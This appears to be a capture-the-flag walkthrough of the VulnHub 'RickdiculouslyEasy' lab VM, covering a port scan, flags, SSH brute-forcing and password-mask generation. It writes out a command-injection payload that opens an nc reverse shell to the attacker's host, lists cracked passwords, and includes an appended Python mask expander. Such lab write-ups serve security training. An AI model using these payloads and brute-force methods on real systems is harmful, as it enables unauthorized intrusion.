RICKDICULOUSLYEASY 1

https://download.vulnhub.com/rickdiculouslyeasy/RickdiculouslyEasy.zip

Target IP: 192.168.32.12

Scan the externally exposed ports and services

┌──(root㉿kali)-[/tmp]
└─# nmap -sV -p1-65535 192.168.32.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 04:54 EDT
Nmap scan report for 192.168.32.12
Host is up (0.00018s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service 161 or earlier
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NULL,
SF:42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4\
SF:.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.92%I=7%D=9/8%Time=6319ADCA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\
SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev
SF:erse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:73:25:78 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.88 seconds

FTP anonymous login

Visit port 80

Visit port 9090 and obtain FLAG {There is no Zeus, in your face!} - 10 Points

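Visit port 13337

Visit port 60000

Brute-force the web directories on port 80, which turns up /robots.txt

Visit /robots.txt

/cgi-bin/tracertool.cgi turns out to have a command injection vulnerability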

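Start a listener and try: ; nc -n <kali-ip> <kali-port> -e /usr/bin/bash
Unfortunately, no shell comes back! It looks like some kind of firewall is blocking outbound connections.

Look in the /var/www/html directory and find the passwords directory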

Get the users to use for brute-forcing SSH

Brute-force port 22222 and find the user Summer

Log in via SSH

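Inspect the image file and find the password: Meeseek

Extract the archive

Using the hint from the safe binary that was found, I looked up Rick's old band - The Flesh Curtains. I also needed to build some password permutations from these words in a specific order:

  • 1 uppercase character

  • Then, 1 digit

  • Finally, one of the words in the band's name - Flesh or Curtains

Generate the permutations with Hashcat's maskprocessor

Now, using my wordlist - rick, I will try to brute-force SSH with hydra

And after a while I got a hit: P7Curtains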
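
The mask described above (one uppercase letter, one digit, then Flesh or Curtains), as an added example that is not part of the original write-up: a small Python expander for hashcat-style masks that also reports the size of the candidate space. It supports only ?u, ?l, ?d and literal characters; the function names and the MASKS list are assumptions made for this illustration.

```python
import itertools
import math
import string

# Built-in charsets in hashcat/maskprocessor mask notation (subset: ?u ?l ?d).
CHARSETS = {
    "u": string.ascii_uppercase,
    "l": string.ascii_lowercase,
    "d": string.digits,
}

# Assumption: the two masks implied by the rule in the write-up.
MASKS = ["?u?dFlesh", "?u?dCurtains"]


def parse_mask(mask):
    """Return one string of allowed characters per output position."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            positions.append(mask[i])      # literal character
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        key = mask[i + 1]
        if key == "?":
            positions.append("?")          # '??' is a literal question mark
        elif key in CHARSETS:
            positions.append(CHARSETS[key])
        else:
            raise ValueError(f"unsupported charset ?{key}")
        i += 2
    return positions


def keyspace(mask):
    """Number of candidates a mask produces, without generating them."""
    return math.prod(len(p) for p in parse_mask(mask))


def expand(mask):
    """Yield every candidate string for one mask."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def build_wordlist(masks):
    """Expand all masks into one de-duplicated, order-preserving list."""
    return list(dict.fromkeys(w for m in masks for w in expand(m)))
```

Each mask yields 26 × 10 = 260 strings, so the whole list is 520 candidates, which is why a password built on this pattern falls quickly to online guessing.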
